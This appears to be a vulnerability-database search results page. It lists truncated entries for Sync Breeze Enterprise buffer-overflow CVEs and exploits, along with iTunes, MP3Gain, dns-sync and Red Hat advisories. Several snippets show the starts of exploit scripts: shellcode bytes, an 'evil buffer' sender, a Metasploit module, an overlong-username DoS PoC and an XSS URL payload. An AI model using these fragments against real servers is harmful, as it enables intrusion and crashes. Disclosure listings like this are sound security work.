CVE-2017-7079

An issue was discovered in certain Apple products. iTunes before 12.7 is affected. The issue involves the "Data Sync" component. It allows attackers to access iOS backups written by iTunes via a crafted app...

Sync Breeze Enterprise 10.1.16 - POST Remote Buffer Overflow

Sync Breeze Enterprise 10.1.16 - POST Remote Buffer Overflow !/usr/bin/python import socket try: print "\nSending evil buffer..." shellcode = "\xba\x31\x13\x39\xe4\xdb\xd3\xd9\x74\x24\xf4\x5e\x33\xc9\xb1" "\x52\x31\x56\x12\x03\x56\x12\x83\xdf\xef\xdb\x11\xe3\xf8\x9e"...

Sync Breeze Enterprise 10.1.16 - 'POST' Remote Buffer Overflow

!/usr/bin/python import socket try: print "\nSending evil buffer..." shellcode = "\xba\x31\x13\x39\xe4\xdb\xd3\xd9\x74\x24\xf4\x5e\x33\xc9\xb1" "\x52\x31\x56\x12\x03\x56\x12\x83\xdf\xef\xdb\x11\xe3\xf8\x9e" "\xda\x1b\xf9\xfe\x53\xfe\xc8\x3e\x07\x8b\x7b\x8f\x43\xd9\x77"...

Sync Breeze Enterprise 10.1.16 - Remote Buffer Overflow (SEH) (Metasploit)

Sync Breeze Enterprise 10.1.16 - Remote Buffer Overflow SEH Metasploit This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule 'SyncBreeze v10.1.16 SEH GET Overflow', 'Description' = %...

Sync Breeze Enterprise 10.1.16 SEH Overflow Exploit

Exploit for windows platform in category remote exploits !/usr/bin/env python Exploit Title : Sync Breeze Enterprise v10.1.16 0day Date : 10/11/2017 Vendor HomePage : http://www.syncbreeze.com Exploit Author : Milton Valencia wetw0rk Software : http://www.syncbreeze.com/downloads.html Version :...

Sync Breeze Enterprise 10.1.16 SEH Overflow

!/usr/bin/env python Exploit Title : Sync Breeze Enterprise v10.1.16 0day Date : 10/11/2017 Vendor HomePage : http://www.syncbreeze.com Exploit Author : Milton Valencia wetw0rk Software : http://www.syncbreeze.com/downloads.html Version : 10.1.16 Tested on : Windows 7 x86 Description : Sync Breez...

CVE-2017-14980

Buffer overflow in Sync Breeze Enterprise 10.0.28 allows remote attackers to have unspecified impact via a long username parameter to /login...

CVE-2017-14980

Buffer overflow in Sync Breeze Enterprise 10.0.28 allows remote attackers to have unspecified impact via a long username parameter to /login...

Buffer overflow

Buffer overflow in Sync Breeze Enterprise 10.0.28 allows remote attackers to have unspecified impact via a long username parameter to /login...

CVE-2017-14980

CVE-2017-14980 — Sync Breeze Enterprise vulnerable to a stack-based buffer overflow in the web login interface (Sync Breeze Enterprise 10.0.28). A remote, unauthenticated attacker can cause memory corruption and achieve remote code execution via a long username parameter to /login. Public PoCs an...

CVE-2017-14980

Buffer overflow in Sync Breeze Enterprise 10.0.28 allows remote attackers to have unspecified impact via a long username parameter to /login...

Sync Breeze Enterprise 10.0.28 Buffer Overflow

Exploit Title: SyncBreeze POST username overflow Date: 30-Sep-2017 Exploit Author: Owais Mehtab Vendor Homepage: http://www.syncbreeze.com Software Link: http://www.syncbreeze.com/setups/syncbreezeentsetupv10.0.28.exe Version: 10.0.28 Tested on: Windows 7 !/usr/bin/python import socket import os...

Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow

Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow Exploit Title: SyncBreeze POST username overflow Date: 30-Sep-2017 Exploit Author: Owais Mehtab Vendor Homepage: http://www.syncbreeze.com Software Link: http://www.syncbreeze.com/setups/syncbreezeentsetupv10.0.28.exe Version: 10.0.28 Tested...

iTunes < 12.7 Data Sync Vulnerability (Mac OS)

The version of iTunes installed on the remote Mac OS X host is older than 12.7. It is, therefore, affected by a data sync vulnerability. C Tenable Network Security, Inc. include"compat.inc"; if description scriptid103508; scriptversion"1.6"; scriptcvsdate"Date: 2019/11/12";...

Sync Breeze Enterprise 10.0.28 - Denial of-Service (PoC)

!/usr/bin/python import socket import sys try: server = sys.argv1 port = 80 size = 800 inputBuffer = b"A" size content = b"username=" + inputBuffer + b"&password=A" buffer = b"POST /login HTTP/1.1\r\n" buffer += b"Host: " + server.encode + b"\r\n" buffer += b"User-Agent: Mozilla/5.0 X11; Linux866...

syncinteractive.com XSS vulnerability

Vulnerable URL: https://www.syncinteractive.com/portfolio.php?categoryid=1%27%22%3E%3Csvg/onload=confirm/OPENBUGBOUNTY/%3E=77 Details: Description| Value ---|--- Patched:| Yes, at Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculated VIP website...

DEBIAN-CVE-2017-14406

A NULL pointer dereference was discovered in syncbuffer in interface.c in mpglibDBL, as used in MP3Gain version 1.5.2. The vulnerability causes a segmentation fault and application crash, which leads to remote denial of service...

About the security content of iTunes 12.7

About the security content of iTunes 12.7 This document describes the security content of iTunes 12.7. About Apple security updates For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available...

Command Injection

Overview Affected versions of dns-sync have an arbitrary command execution vulnerability in the resolve method. Recommendation - Use an alternative dns resolver - Do not allow untrusted input into dns-sync.resolve References - Issue 1 - Commit d9abaae...

Moderate: Red Hat Security Advisory: satellite and spacewalk security and bug fix update

An update for satellite-schema, spacewalk-backend, spacewalk-java, and spacewalk-schema is now available for Red Hat Satellite 5.8 and Red Hat Satellite 5.8 ELS. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System CVSS base...